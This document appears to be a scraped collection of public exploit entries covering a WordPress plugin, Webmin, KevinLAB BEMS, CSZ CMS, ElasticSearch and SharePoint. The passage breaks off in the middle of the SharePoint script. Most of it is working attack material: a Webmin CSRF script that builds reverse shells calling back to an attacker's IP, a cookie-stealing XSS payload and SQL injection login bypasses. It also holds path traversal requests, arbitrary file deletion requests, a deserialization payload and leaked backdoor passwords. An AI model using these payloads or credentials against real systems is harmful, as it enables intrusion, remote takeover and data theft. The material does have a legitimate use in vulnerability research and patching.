-
WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS) # Date: 19/07/2021 # Exploit Author: Aakash Choudhary # Software Link: https://wordpress.org/plugins/kn-fix-your/ # Version: 1.0.1 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate KN Fix Your Title 3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>
-
Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) # Date: 24/04/2021 # Exploit Author: Mesh3l_911 & Z0ldyck # Vendor Homepage: https://www.webmin.com # Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 # Version: Webmin 1.973 # Tested on: All versions <= 1.973 # CVE: CVE-2021-31761 # Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to # get a Remote Command Execution (RCE) through the Webmin's running process # feature import time, subprocess,random,urllib.parse print('''\033[1;37m __ __ _ ____ _ _________ _ _ _ | \/ | | | |___ \| | |___ / _ \| | | | | | | \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ | |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / | | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < |_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ __/ | |___/ \033[1;m''') for i in range(101): print( "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( i), "\033[1;36m%\033[1;m", end="") time.sleep(0.02) print("\n\n") target = input( "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") if target.endswith('/'): target = target + 'tunnel/link.cgi/' else: target = target + '/tunnel/link.cgi/' ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m") port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m") ReverseShell = input \ ('''\033[1;37m \n 1- Bash Reverse Shell \n 2- PHP Reverse Shell \n 3- Python Reverse Shell \n 4- Perl Reverse Shell \n 5- Ruby Reverse Shell \n \033[1;m \033[1;36mPlease insert the number Reverse Shell's type u want e.g. 
( 1 ) > \033[1;m''') file_name = random.randrange(1000) if ReverseShell == '1': ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' elif ReverseShell == '2': ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' ''' elif ReverseShell == '3': ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' elif ReverseShell == '4': ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''' elif ReverseShell == '5': ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''' else: print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n") def CSRF_Generator(): Payload = urllib.parse.quote(''' <html> <head> <meta name="referrer" content="never"> </head> <body> <script>history.pushState('', '', '/')</script> <form action="/proc/run.cgi" method="POST"> <input type="hidden" name="cmd" value="''' + ReverseShell + '''" /> <input type="hidden" name="mode" value="0" /> <input type="hidden" name="user" value="root" /> <input type="hidden" name="input" value="" /> <input type="hidden" name="undefined" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ''') print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m") print(target+Payload) def Netcat_listener(): print() subprocess.run(["nc", "-nlvp 
"+port+""]) def main(): CSRF_Generator() Netcat_listener() if __name__ == '__main__': main()
-
KevinLAB BEMS 1.0 - Undocumented Backdoor Account
# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5654 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php 05.07.2021 -- Backdoor accounts from the DB: ------------------------------ Username: kevinlab (permission=1) Password: kevin003 Username: developer1 (permission=6) Password: 1234
-
KevinLAB BEMS 1.0 - Authentication Bypass
# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficiency of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through the 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and to bypass the authentication mechanism. 
Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5655 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php 05.07.2021 -- PoC POST data payload (extract): -------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] PoC POST data payload (authbypass): ----------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
-
CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion # Date: 2021-07-20 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.cszcms.com # Software Link: https://sourceforge.net/projects/cszcms/files/latest/download # Version: 1.2.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/cskaza/cszcms/issues/32 ################ # Description # ################ # CSZ CMS is an open source Content Management System web application that allows managing all content and settings of a website. CSZ CMS is built on CodeIgniter3 and uses Bootstrap3 for its structure. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. In PHP this occurs when the unlink() function is called and user input can affect part or all of the path parameter that names the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has permission to delete). Furthermore, an attacker might leverage arbitrary file deletion to circumvent certain web server security mechanisms, for example by deleting the .htaccess file, which would deactivate the constraints it enforces. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php Steps to Reproduce: 1. Login as admin 2. Goto Plugin Manager > Article > edit any article 3. Upload any image as "Main Picture" and "File Upload" and click save button 4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button 5. 
Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2" 1) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root Request: ======== POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1 Host: localhost Content-Length: 2048 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25 Connection: close ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="title" article beta ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="keyword" testing file ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="short_desc" deletion ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="cat_id" 2 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="content" <div class="row"> <div class="col-md-12"> <p>test for file deletion</p> </div> </div> <p><br><br></p> ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: 
form-data; name="del_file" ../../../conf_secret_file.php ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainPicture" 2021/1626802955_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="del_file2" ../../../config_backup.txt ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload2"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainFile" 2021/1626802956_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="lang_iso" en ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_limit" 5 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_sort" reverse_time ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundaryAMyATk1BfQaBOHvY-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php Steps to Reproduce: 1. Login as admin 2. Goto General Menu > Site Setting 3. Upload any image as "Site Logo" and "Image of og metatag" and click save button 4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button 5. 
Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image" 2) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in web root Request: ======== POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1 Host: localhost Content-Length: 5163 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu Connection: close ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTitle" CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="title_setting" 2 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteFooter" © %Y% CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteKeyword" CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTheme" cszdefault ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 
Content-Disposition: form-data; name="siteLang" english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_metatag" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_js" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="pagecache_time" 0 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="assets_static_domain" [email protected] ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="html_optimize_disable" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_file" ../../conf_secret_file.php ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteLogo" 2021/1626800829_logo.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_og_image" ../../config_backup.txt ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="og_image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ogImage" 2021/1626800829_og.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteEmail" [email protected] ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_protocal" mail ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_host" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_user" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_pass" 123456 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_port" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="sendmail_path" 
------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_logs" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_sitekey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_secretkey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_client_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_view_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gsearch_cxid" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_key" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lat" -28.621975 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lng" 150.689082 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="fbapp_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="facebook_page_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="adobe_cc_apikey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_bg" #645862 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_fg" #ffffff ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_link" #f1d600 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_msg" This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_linkmsg" Privacy Policy and terms. 
------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_moreinfo" https://www.cszcms.com/LICENSE.md ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_txtalign" left ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_close" Got it! ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundary8cAl5KcKGP0D3Qi2-- --- # For a more detailed explanation, refer to the GitHub issue on cszcms at https://github.com/cskaza/cszcms/issues/32 # The affected version is 1.2.9.
-
KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)
# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated) # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficiency of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'page' GET parameter in index.php is not properly verified before being used to include files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5656 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php 05.07.2021 -- GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin ... ...
-
ElasticSearch 7.13.3 - Memory disclosure
# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure # Date: 21/07/2021 # Exploit Author: r0ny # Vendor Homepage: https://www.elastic.co/ # Software Link: https://github.com/elastic/elasticsearch # Version: 7.10.0 to 7.13.3 # Tested on: Kali Linux # CVE : CVE-2021-22145 #/usr/bin/python3 from argparse import ArgumentParser import requests from packaging import version import json from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print("\n################################################################################################") print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3) ######") print("###### Exploit by r0ny (https://twitter.com/_r0ny) ######") print("################################################################################################\n") parser = ArgumentParser() parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service") parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="") parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="") args = parser.parse_args() if not (args.url): parser.error('Please input the elasticsearch url. 
e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"') #Prepare authentication header authorization_header = "" if(args.api_key or args.basic): authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic #Check elasticsearch version r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False) try: es_version = json.loads(r.content)["version"]["number"] except: print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n") print("# Server response: " + str(r.content)) exit() if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"): print("# Elastic Service not vulnerable") print("# Elastic Service version: " + es_version) print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3") exit() #Prepare exploitation payload = "@\n" vulnerable_endpoint = "/_bulk" url = args.url + vulnerable_endpoint #Exploitation print("# ElasticSearch Version: " + es_version) print("# Request to " + url+"\n") r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False) #Read Memory Leak and remove stacktrace print("$$$$$$$$$$$$$$$$$$$$$$$$$") print("$$$$$ Memory Leaked $$$$$") print("$$$$$$$$$$$$$$$$$$$$$$$$$\n") response = json.loads(r.content) leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0] leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0] print(leak1+"\n"+leak2)
-
Microsoft SharePoint Server 2019 - Remote Code Execution (2)
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2) # Google Dork: inurl:quicklinks.aspx # Date: 2020-08-14 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service # Pack 2, SharePoint Server 2019 # Tested on: Windows 2016 # CVE : CVE-2020-1147 # Credit goes to Steven Seele and Soroush Dalili # Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html #!/usr/bin/python from sys import argv, exit, stdout, stderr import argparse import requests from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests_ntlm import HttpNtlmAuth from urllib import quote, unquote import logging class Exploit(object): # To generate the gadget use: # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command" # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command" gadget = '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' control_path_quicklinks = '/_layouts/15/quicklinks.aspx' control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx' control_path = control_path_quicklinks def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.username = '%s\\%s' % (domain, username) self.target = target self.password = password self.session = requests.session() self.redirect = redirect self.timeout = 0.5 self.proxies = { 'http': 'http://%s' % proxy_address, 'https': 'http://%s' % proxy_address } \ if proxy_address is not None \ and proxy_address != '' else {} self.headers = {} self.query_params = { 'Mode': "Suggestion" } self.form_values = { '__viewstate': '', '__SUGGESTIONSCACHE__': '' } self.cookies = {} self.payload = """\ <DataSet> 
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset"> <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true"> <xs:complexType> <xs:choice minOccurs="0" maxOccurs="unbounded"> <xs:element name="Exp_x0020_Table"> <xs:complexType> <xs:sequence> <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/> </xs:sequence> </xs:complexType> </xs:element> </xs:choice> </xs:complexType> </xs:element> </xs:schema> <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1"> <somedataset> <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted"> <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <ExpandedElement/> <ProjectedProperty0> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType> </MethodParameters> <ObjectInstance xsi:type="LosFormatter"></ObjectInstance> </ProjectedProperty0> </pwn> </Exp_x0020_Table> </somedataset> </diffgr:diffgram> </DataSet>""".replace('{GADGET}', self.gadget) def do_get(self, url, params=None, data=None): return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=data, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def do_post(self, url, data=None, 
params=None): return self.session.post( url=url, data=data, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def parse_page(self, content): soup = BeautifulSoup(content, 'lxml') for key, val in self.form_values.iteritems(): try: for tag in soup.select('input[name=%s]' % key): try: self.form_values[key] = tag['value'] except Exception as error: stderr.write('error for key %s error %s\n' % (key, str(error))) except Exception as error: stderr.write('error for selector %s error %s\n' % (key, str(error))) return self def debug(self): try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def clean(self, payload): payload = payload.replace('\n', '').replace('\r', '') while ' ' in payload: payload = payload.replace(' ', ' ') return payload def get_form(self): url = '%s%s' % (self.target, self.control_path) resp = self.do_get(url=url, params=self.query_params) self.parse_page(content=resp.content) return resp def send_payload(self): url = '%s%s' % (self.target, self.control_path) # self.get_form() self.headers['Content-Type'] = 'application/x-www-form-urlencoded' self.form_values['__SUGGESTIONSCACHE__'] = 